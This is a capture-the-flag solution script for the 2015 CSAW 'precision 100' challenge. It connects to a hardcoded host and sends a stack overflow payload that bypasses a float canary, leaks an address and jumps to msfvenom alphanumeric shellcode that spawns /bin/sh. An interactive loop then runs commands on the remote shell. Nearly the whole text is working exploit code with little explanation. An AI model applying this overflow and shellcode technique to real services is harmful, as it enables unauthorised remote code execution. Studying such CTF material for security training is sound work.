2015 CSAW CTF precision 100 exonly

from socket import *

from struct import *

import time

#####################################

def until(s, string):

   data=''

   while string not in data:

      data += s.recv(1)

   return data

#####################################

p = lambda x: pack('<L',x)

q = lambda x:pack('<Q',x)

up = lambda x : unpack('<L',x)

uq = lambda x:unpack('<Q',x)

host = '54.173.98.115'

port = 1259

sock = socket(AF_INET, SOCK_STREAM)

sock.connect((host,port))

//msfvenom -p linux/x86/exec CMD=/bin/sh -b '\x00' -e x86/alpha_mixed

shellcode = "\x89\xe6\xdb\xce\xd9\x76\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a"

shellcode += "\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59"

shellcode += "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"

shellcode += "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"

shellcode += "\x75\x4a\x49\x71\x7a\x34\x4b\x61\x48\x4a\x39\x52\x72\x52"

shellcode += "\x46\x51\x78\x36\x4d\x72\x43\x4b\x39\x59\x77\x65\x38\x76"

shellcode += "\x4f\x70\x73\x42\x48\x53\x30\x31\x78\x74\x6f\x75\x32\x70"

shellcode += "\x69\x52\x4e\x4e\x69\x6b\x53\x73\x62\x6a\x48\x75\x58\x47"

shellcode += "\x70\x57\x70\x67\x70\x64\x6f\x75\x32\x70\x69\x62\x4e\x64"

shellcode += "\x6f\x54\x33\x70\x68\x35\x50\x71\x47\x42\x73\x4d\x59\x4d"

shellcode += "\x31\x4a\x6d\x6d\x50\x41\x41"

payload = "A" * 128

payload += p(0x475a31a5)

payload += p(0x40501555)

payload += "B" * 12 # sfp

payload += p(0x0804851D)

sock.send(payload + "\n")

lib = until(sock, "\n")

lib = lib[6:]

lib = int(lib,16) + 200

print lib

print until(sock, "\n")

payload2 = "A" * 128

payload2 += p(0x475a31a5)

payload2 += p(0x40501555)

payload2 += "B" * 16 # sfp

payload2 += p(lib) # ret

payload2 += "\x90" * 100

payload2 += shellcode

payload2 += "C" * 30

print "lib : " + hex(lib)

sock.send(payload2 + "\n")

print sock.recv(1024)

print sock.recv(1024)

while True:

        cmd = raw_input('$ ')

        sock.send(cmd+"\n")

       print sock.recv(1024)

// 아스크 쉘 코드를 써야만 했던 문제